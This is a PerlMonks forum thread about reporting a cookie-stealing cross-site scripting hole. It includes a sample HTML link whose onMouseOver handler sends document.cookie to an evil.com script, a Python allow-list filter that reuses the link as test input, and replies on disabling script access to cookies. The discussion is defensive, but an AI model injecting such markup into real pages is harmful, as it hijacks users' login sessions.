in reply to Re: Where to report a security hole?
in thread Where to report a security hole?

 Thanks - It turns out this was a known issue which had been discussed before.

 I was referring to malicious links being able to steal your login cookie via a link of the following form:

<a href="http://www.some.com/"
  onMouseOver="document.location='http://evil.com/steal.cgi?id=' +
   document.cookie;">Link Text</a>

 For example

 This only works on personal nodes, apparently, so it's not considered a problem.

 Update: I guess the general solution to this problem from a CGI filtering point of view is to remove all attributes from HTML tags which aren't explicitly allowed.

 Failing that, you could filter out the 'obvious' dangerous ones, but you'd probably miss quite a few.

Steve
---
steve.org.uk
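
The allow-list filtering described in the update above, as an added example that is not part of the original post: Python's standard html.parser stands in for the CGI filter, and the policy in ALLOWED, the names sanitize, safe_url and AllowListFilter, and the href scheme check (which goes one step beyond the post) are all assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed policy for this example: tag -> attributes explicitly allowed on it.
ALLOWED = {"a": {"href", "title"}, "b": set(), "i": set(), "p": set(), "code": set()}
SAFE_SCHEMES = {"http", "https", "mailto"}  # extension: also vet the href scheme

# The link from the post, reused as sample input.
SAMPLE = ('<a href="http://www.some.com/"\n'
          "  onMouseOver=\"document.location='http://evil.com/steal.cgi?id=' +\n"
          '   document.cookie;">Link Text</a>')

def safe_url(value):
    try:
        return urlsplit(value.strip()).scheme.lower() in SAFE_SCHEMES
    except ValueError:  # malformed URL, e.g. unbalanced IPv6 brackets
        return False

class AllowListFilter(HTMLParser):
    """Re-emit markup, keeping only allow-listed tags and attributes."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):  # names arrive lower-cased
        if tag not in ALLOWED:
            return  # tag not on the list: drop it, its text is still escaped
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue  # onmouseover, style, ... never reach the output
            if name == "href" and not safe_url(value):
                continue  # javascript:, data: and scheme-less values are dropped
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

def sanitize(fragment):
    parser = AllowListFilter()
    parser.feed(fragment)
    parser.close()  # flush any text still buffered
    return "".join(parser.out)
```

Because the output is rebuilt from the parsed tokens rather than edited in place, an event handler the filter author never thought of is dropped the same way as onMouseOver, which is the advantage over filtering out only the 'obvious' attributes.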

Re: Re: Where to report a security hole?
by djantzen (Priest) on Mar 15, 2003 at 01:22 UTC

    I'm not a web guy, but my understanding is that this is why so many monks have JavaScript disabled for this site. You might visit Petruchio's node if you wish to see a friendly warning of this sort of attack.


    "The dead do not recognize context" -- Kai, Lexx

      You needn't disable JavaScript entirely; just get yourself a good browser and you can disable cookie access via JS.

      --
      http://fruiture.de